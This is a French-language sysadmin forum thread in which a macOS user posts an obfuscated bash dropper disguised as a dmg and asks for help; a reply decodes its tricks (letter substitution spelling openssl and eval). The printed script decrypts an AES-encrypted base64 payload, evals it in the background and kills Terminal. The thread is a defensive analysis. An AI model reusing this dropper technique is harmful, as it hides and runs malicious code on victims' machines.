1 votes

Logiciels malveillants ? Besoin d'aide pour identifier

J'ai donc très bêtement ouvert un fichier sans voir l'extension .command, et le fichier était déguisé en dmg, comme le fichier dans l'icône du zip était un dmg... Voici le contenu du script et je n'arrive pas, pour ma part, à comprendre ce qu'il fait... Quelqu'un peut-il m'aider ? Pour info, c'est sur macos

#!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX18IxSV6HXvYPgsz99KRREfIXHNGMvIOaDnLlDgldMtEjCU5rBZT0Hhb73bNx9ldy1GbpkDA0NbrbMuhVbw6GtQbreV6pIKjPSujA6SPaGMHT6pXRPejt91PAeLyEB0so+1YmmDeR2M4EKe6QaXfrsLuQP3lqOyO4lm/9MWaVf2YDD5zZ2upz5kN7/6/0pyQt4isz127jAc94vWcQj9MPm2oN6Hq+wvPevmJ/ybxvDzVP7GmWjBhAj9yMwEmMlbMR05FArhQpN9ZRc0wgcec6LhY0ujXAmmQoExTErcCZLz9aqkQxIGq3SrppaRf2f/uMPLgxUeSqNN/SSrIpy22Qf5s3rsCvm2dAGQc2Tyx0OCWELzieSbyAx9D3VCKpcONmmunyuj4YgkD3A=='
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &
killall Terminal

0voto

jvb Points 2430

Je ne peux pas l'identifier, mais je peux vous donner un indice sur la façon de commencer l'analyse...

Vous pouvez procéder à des substitutions obscurcissantes (par ex. H="e" ) et les appliquer juste dans votre esprit - Vous pouvez donc facilement voir que le script essaiera de ${H}v${G}${V} (= eval ) les données décryptées F ommand (belle coquille).

La commande elle-même utilise ${T}${J}${H}${X}${K}${K}${V} (qui est évidemment openssl , avec ${H}${X}${F} = enc ).

Ne pas être tenté d'exécuter ce script (par exemple après avoir simplement inséré echo / exit lignes). Il suffit de décoder les commandes et les arguments par soi-même, comme indiqué ci-dessus, puis de les comprendre suffisamment bien avec la détention man pages, et seulement puis se demander s'il est suffisamment sûr d'effectuer ces étapes à la main pour déballer la couche suivante.

L'étape suivante consiste à copier le fichier commandArgs de l'entreprise dans un nouvel endroit, et d'essayer d'appliquer openssl (avec les arguments corrects) pour obtenir la commande à exécuter. eval d.

SistemesEz.com

SystemesEZ est une communauté de sysadmins où vous pouvez résoudre vos problèmes et vos doutes. Vous pouvez consulter les questions des autres sysadmins, poser vos propres questions ou résoudre celles des autres.

Powered by:

X